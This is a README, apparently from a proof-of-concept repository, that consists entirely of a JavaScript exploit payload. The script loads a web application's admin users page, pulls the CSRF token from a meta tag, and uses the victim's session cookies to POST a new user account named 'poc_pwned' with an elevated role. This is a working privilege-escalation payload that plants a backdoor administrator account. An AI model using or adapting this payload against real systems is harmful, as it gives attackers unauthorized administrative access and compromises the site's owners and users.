README.md
Rendering markdown...
const targeturl = "http://192.168.0.24/admin/users"
async function make_user(endpoint, token) {
const body = new URLSearchParams({
_token: token,
name: 'poc_pwned',
email: '[email protected]',
password: 'poc_pwned',
role: '2'
});
try {
const res = await fetch(endpoint, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: body.toString(),
credentials: 'include'
});
if (!res.ok) {
const text = await res.text();
}
const contentType = res.headers.get('content-type') || '';
if (contentType.includes('application/json')) {
return await res.json();
} else {
return await res.text();
}
} catch (err) {
throw err;
}
}
async function perform_magic() {
const response = await fetch(targeturl);
const html = await response.text();
const parser = new DOMParser();
const doc = parser.parseFromString(html, 'text/html');
const meta = doc.querySelector('meta[name="csrf-token"]');
if (!meta) {
console.log("lol wtf");
return;
}
make_user(targeturl, meta.content)
}
perform_magic()